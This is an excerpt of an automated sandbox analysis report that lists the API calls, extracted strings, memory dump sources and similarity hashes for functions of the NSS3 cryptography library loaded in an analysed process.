                                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6F0CD5
                                                                                        • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C6F0D1D
                                                                                        • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C6F0D3B
                                                                                        • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C6F0D7D
                                                                                        • free.MOZGLUE(00000000), ref: 6C6F0DB5
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F0DC1
                                                                                        • free.MOZGLUE(00000000), ref: 6C6F0DF7
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6F0E05
                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6F0E0F
                                                                                          • Part of subcall function 6C6C95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C95E0
                                                                                          • Part of subcall function 6C6C95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C6A7F4A,00000000,?,00000000,00000000), ref: 6C6C95F5
                                                                                          • Part of subcall function 6C6C95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C6C9609
                                                                                          • Part of subcall function 6C6C95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6C961D
                                                                                          • Part of subcall function 6C6C95C0: PK11_GetInternalSlot.NSS3 ref: 6C6C970B
                                                                                          • Part of subcall function 6C6C95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C6C9756
                                                                                          • Part of subcall function 6C6C95C0: PK11_GetIVLength.NSS3(?), ref: 6C6C9767
                                                                                          • Part of subcall function 6C6C95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C6C977E
                                                                                          • Part of subcall function 6C6C95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C978E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                        • String ID: *,ol$*,ol$-$ol
                                                                                        • API String ID: 3136566230-3848321967
                                                                                        • Opcode ID: 5319c04c76b2e39226f751383a71b2b52d61223db96ce6a35b1a83fd46888c52
                                                                                        • Instruction ID: 34283563ebda4d4709a60c9d19a4bbde3e3fcebedae9528eb24ee52544609efe
                                                                                        • Opcode Fuzzy Hash: 5319c04c76b2e39226f751383a71b2b52d61223db96ce6a35b1a83fd46888c52
                                                                                        • Instruction Fuzzy Hash: B241F2B1901246ABEB009F64DC45BEF76B9EF0530CF144024E92567741EB35AA15CBFA
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_DecryptInit), ref: 6C6B6676
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B66A4
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B66B3
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B66C9
                                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C6B66E8
                                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C6B6716
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B6728
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B673E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmp
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: hKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptInit$nyl
                                                                                        • API String ID: 1003633598-3547332360
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_EncryptFinal), ref: 6C6B6526
                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6B6554
                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6B6563
                                                                                          • Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963
                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C6B6579
                                                                                        • PR_LogPrint.NSS3( pLastEncryptedPart = 0x%p,?), ref: 6C6B6595
                                                                                        • PR_LogPrint.NSS3( pulLastEncryptedPartLen = 0x%p,?), ref: 6C6B65B0
                                                                                        • PR_LogPrint.NSS3( *pulLastEncryptedPartLen = 0x%x,?), ref: 6C6B661A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                        • String ID: *pulLastEncryptedPartLen = 0x%x$ hSession = 0x%x$ pLastEncryptedPart = 0x%p$ pulLastEncryptedPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_EncryptFinal$nyl
                                                                                        • API String ID: 1003633598-1952597278
                                                                                        APIs
                                                                                        • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C7B1DE0,?), ref: 6C6E6CFE
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6E6D26
                                                                                        • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C6E6D70
                                                                                        • PORT_Alloc_Util.NSS3(00000480), ref: 6C6E6D82
                                                                                        • DER_GetInteger_Util.NSS3(?), ref: 6C6E6DA2
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6E6DD8
                                                                                        • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C6E6E60
                                                                                        • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C6E6F19
                                                                                        • PK11_DigestBegin.NSS3(00000000), ref: 6C6E6F2D
                                                                                        • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C6E6F7B
                                                                                        • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6E7011
                                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6C6E7033
                                                                                        • free.MOZGLUE(?), ref: 6C6E703F
                                                                                        • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C6E7060
                                                                                        • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C6E7087
                                                                                        • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C6E70AF
                                                                                        Similarity
                                                                                        • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                        • String ID:
                                                                                        • API String ID: 2108637330-0
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6CE5A0
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C6CE5F2
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ErrorValuememcpy
                                                                                        • String ID: 0
                                                                                        • API String ID: 3044119603-4108050209
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(#?jl,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C62
                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C76
                                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C86
                                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2C93
                                                                                          • Part of subcall function 6C72DD70: TlsGetValue.KERNEL32 ref: 6C72DD8C
                                                                                          • Part of subcall function 6C72DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C72DDB4
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2CC6
                                                                                        • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23,?), ref: 6C6A2CDA
                                                                                        • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?,?,6C6A3F23), ref: 6C6A2CEA
                                                                                        • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?), ref: 6C6A2CF7
                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C69E477,?,?,?,00000001,00000000,?), ref: 6C6A2D4D
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6A2D61
                                                                                        • PL_HashTableLookup.NSS3(?,?), ref: 6C6A2D71
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6A2D7E
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707AD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707CD
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C60204A), ref: 6C6707D6
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C60204A), ref: 6C6707E4
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,6C60204A), ref: 6C670864
                                                                                          • Part of subcall function 6C6707A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C670880
                                                                                          • Part of subcall function 6C6707A0: TlsSetValue.KERNEL32(00000000,?,?,6C60204A), ref: 6C6708CB
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708D7
                                                                                          • Part of subcall function 6C6707A0: TlsGetValue.KERNEL32(?,?,6C60204A), ref: 6C6708FB
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                        • String ID: #?jl
                                                                                        • API String ID: 2446853827-1742918463
                                                                                        APIs
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C75A4E6
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C75A4F9
                                                                                        • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C75A553
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C75A5AC
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C75A5F7
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C75A60C
                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C75A633
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C75A671
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C75A69A
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                        • API String ID: 2358773949-598938438
                                                                                        APIs
                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,6C681984,?), ref: 6C6845F2
                                                                                        • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6845FB
                                                                                          • Part of subcall function 6C6E0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E08B4
                                                                                        • SECITEM_CompareItem_Util.NSS3(00000000,-00000001), ref: 6C68461E
                                                                                          • Part of subcall function 6C6DFCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6C684101,00000000,?,?,?,6C681666,?,?), ref: 6C6DFCF2
                                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,?,-00000019), ref: 6C684646
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C684662
                                                                                        • PR_SetError.NSS3(FFFFE023,00000000), ref: 6C68467A
                                                                                        • PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C684691
                                                                                        • PL_FreeArenaPool.NSS3 ref: 6C6846A3
                                                                                        • PL_FinishArenaPool.NSS3 ref: 6C6846AB
                                                                                        • free.MOZGLUE(?), ref: 6C6846BC
                                                                                        • PORT_ZAlloc_Util.NSS3(?), ref: 6C6846E5
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C684717
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Util$ArenaItem_Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_freememcmpmemcpy
                                                                                        • String ID: security
                                                                                        • API String ID: 3482804875-3315324353
                                                                                        APIs
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6FADB1
                                                                                          • Part of subcall function 6C6DBE30: SECOID_FindOID_Util.NSS3(6C69311B,00000000,?,6C69311B,?), ref: 6C6DBE44
                                                                                        • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6FADF4
                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6FAE08
                                                                                          • Part of subcall function 6C6DB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7B18D0,?), ref: 6C6DB095
                                                                                        • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6FAE25
                                                                                        • PL_FreeArenaPool.NSS3 ref: 6C6FAE63
                                                                                        • PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C6FAE4D
                                                                                          • Part of subcall function 6C604C70: TlsGetValue.KERNEL32(?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604C97
                                                                                          • Part of subcall function 6C604C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CB0
                                                                                          • Part of subcall function 6C604C70: PR_Unlock.NSS3(?,?,?,?,?,6C603921,6C7E14E4,6C74CC70), ref: 6C604CC9
                                                                                        • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6FAE93
                                                                                        • PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C6FAECC
                                                                                        • PL_FreeArenaPool.NSS3 ref: 6C6FAEDE
                                                                                        • PL_FinishArenaPool.NSS3 ref: 6C6FAEE6
                                                                                        • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6FAEF5
                                                                                        • PL_FinishArenaPool.NSS3 ref: 6C6FAF16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                        • String ID: security
                                                                                        • API String ID: 3441714441-3315324353
                                                                                        • Opcode ID: 5fd59f6613885e26a361afee31f6e970d3c9e57e8e0e49a1a9625ea15fb5cac5
                                                                                        • Instruction ID: 2295fd9ebede3d966a4e54eb8e33bf6e2d4f3a2383a3ccdb63ca7f0d83a3f6e9
                                                                                        • Opcode Fuzzy Hash: 5fd59f6613885e26a361afee31f6e970d3c9e57e8e0e49a1a9625ea15fb5cac5
                                                                                        • Instruction Fuzzy Hash: C1413AB2905310A7E7214B24DC44BBE32A9AF4631CF100625E96496F46FB35E60BC7DF
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_GetSlotList), ref: 6C6B25DD
                                                                                        • PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6C6B262A
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C790BAB
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790BBA
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790D7E
                                                                                        • PR_LogPrint.NSS3( pSlotList = 0x%p,?), ref: 6C6B260F
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790B88
                                                                                          • Part of subcall function 6C7909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C790C5D
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C790C8D
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790C9C
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790CD1
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C790CEC
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790CFB
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790D16
                                                                                          • Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C790D26
                                                                                          • Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790D35
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C790D65
                                                                                          • Part of subcall function 6C7909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C790D70
                                                                                          • Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790D90
                                                                                          • Part of subcall function 6C7909D0: free.MOZGLUE(00000000), ref: 6C790D99
                                                                                        • PR_LogPrint.NSS3( tokenPresent = 0x%x,?), ref: 6C6B25F6
                                                                                          • Part of subcall function 6C7909D0: PR_Now.NSS3 ref: 6C790A22
                                                                                          • Part of subcall function 6C7909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C790A35
                                                                                          • Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C790A66
                                                                                          • Part of subcall function 6C7909D0: PR_GetCurrentThread.NSS3 ref: 6C790A70
                                                                                          • Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C790A9D
                                                                                          • Part of subcall function 6C7909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C790AC8
                                                                                          • Part of subcall function 6C7909D0: PR_vsmprintf.NSS3(?,?), ref: 6C790AE8
                                                                                          • Part of subcall function 6C7909D0: EnterCriticalSection.KERNEL32(?), ref: 6C790B19
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790B48
                                                                                          • Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790C76
                                                                                          • Part of subcall function 6C7909D0: PR_LogFlush.NSS3 ref: 6C790C7E
                                                                                        • PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6C6B2699
                                                                                        • PR_LogPrint.NSS3( slotID[%d] = %x,00000000,?), ref: 6C6B26C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Print$DebugOutputStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
                                                                                        • String ID: *pulCount = 0x%x$ pSlotList = 0x%p$ pulCount = 0x%p$ slotID[%d] = %x$ tokenPresent = 0x%x$C_GetSlotList$nyl
                                                                                        • API String ID: 2625801553-4226641309
                                                                                        • Opcode ID: 5373ca0a32c87ceeb75089b5aed4a8d651226e95418f11205278678caab5ef57
                                                                                        • Instruction ID: f2d63a9505cfd41e4088db7a22d47e8e161a9e595d1c557bbc7c590987e6c6dc
                                                                                        • Opcode Fuzzy Hash: 5373ca0a32c87ceeb75089b5aed4a8d651226e95418f11205278678caab5ef57
                                                                                        • Instruction Fuzzy Hash: AE31A132201146AFDB44DF54DE8CA4537F5BB8A35DF044475E904A7A12EF309D64CB6A
                                                                                        APIs
                                                                                        • TlsGetValue.KERNEL32(?,?), ref: 6C698E22
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C698E36
                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C698E4F
                                                                                        • calloc.MOZGLUE(00000001,?,?,?), ref: 6C698E78
                                                                                        • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C698E9B
                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C698EAC
                                                                                        • PL_ArenaAllocate.NSS3(?,?), ref: 6C698EDE
                                                                                        • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C698EF0
                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C698F00
                                                                                        • free.MOZGLUE(?), ref: 6C698F0E
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C698F39
                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C698F4A
                                                                                        • memset.VCRUNTIME140(?,00000000,?), ref: 6C698F5B
                                                                                        • PR_Unlock.NSS3(?), ref: 6C698F72
                                                                                        • PR_Unlock.NSS3(?), ref: 6C698F82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                        • String ID:
                                                                                        • API String ID: 1569127702-0
                                                                                        • Opcode ID: 92363b1d58b0824c7621a30ff66d8c0eefd034613dc7027fffe1e8bda10b86b8
                                                                                        • Instruction ID: 4cf9b32da4fab212e164fd4b01166fd47b73eadb80332d436f12989d65363f33
                                                                                        • Opcode Fuzzy Hash: 92363b1d58b0824c7621a30ff66d8c0eefd034613dc7027fffe1e8bda10b86b8
                                                                                        • Instruction Fuzzy Hash: 23512CB2D00216AFDB009F68DC889AEB7B9FF59358F15412AEC089B710E731ED4587D5
                                                                                        APIs
                                                                                          • Part of subcall function 6C6DA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6AA5DF,?,00000000,6C6828AD,00000000,?,6C6AA5DF,?,object), ref: 6C6DA0C0
                                                                                          • Part of subcall function 6C6DA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6AA5DF,?,00000000,6C6828AD,00000000,?,6C6AA5DF,?,object), ref: 6C6DA0E8
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D2834
                                                                                        • memcmp.VCRUNTIME140(00000000,00000020,00000020,?,?,?,?,?,?,?,?), ref: 6C6D284B
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D2A98
                                                                                        • memcmp.VCRUNTIME140(00000000,?,00000020,?,?,?,?,?,?,?,?,?,?), ref: 6C6D2AAF
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D2BDC
                                                                                        • memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D2BF3
                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D2D23
                                                                                        • memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?), ref: 6C6D2D34
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmpstrlen$strcmp
                                                                                        • String ID: $OQjl$manufacturer$model$serial$token
                                                                                        • API String ID: 2407968032-3654040745
                                                                                        • Opcode ID: a9f1e27aa470194c033675de89c78e131d34c369c3f8b544011be011047a7b98
                                                                                        • Instruction ID: c7a825711ae93cb97586c1983fdfaacc7ca363ea97a50e4b37ac9953b3eb8523
                                                                                        • Opcode Fuzzy Hash: a9f1e27aa470194c033675de89c78e131d34c369c3f8b544011be011047a7b98
                                                                                        • Instruction Fuzzy Hash: 9A02BDA1E0C3C96EF7318762C88CBE12BE09B0531CF4F15F5D9498BAA3C2AD1D999355
                                                                                        APIs
                                                                                        • PORT_Alloc_Util.NSS3(?), ref: 6C6CEE0B
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6CEEE1
                                                                                          • Part of subcall function 6C6C1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C6C1D7E
                                                                                          • Part of subcall function 6C6C1D50: EnterCriticalSection.KERNEL32(?), ref: 6C6C1D8E
                                                                                          • Part of subcall function 6C6C1D50: PR_Unlock.NSS3(?), ref: 6C6C1DD3
                                                                                        • TlsGetValue.KERNEL32 ref: 6C6CEE51
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C6CEE65
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6CEEA2
                                                                                        • free.MOZGLUE(?), ref: 6C6CEEBB
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6CEED0
                                                                                        • PR_Unlock.NSS3(?), ref: 6C6CEF48
                                                                                        • free.MOZGLUE(?), ref: 6C6CEF68
                                                                                        • PR_SetError.NSS3(00000000,00000000), ref: 6C6CEF7D
                                                                                        • PK11_DoesMechanism.NSS3(?,?), ref: 6C6CEFA4
                                                                                        • free.MOZGLUE(?), ref: 6C6CEFDA
                                                                                        • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C6CF055
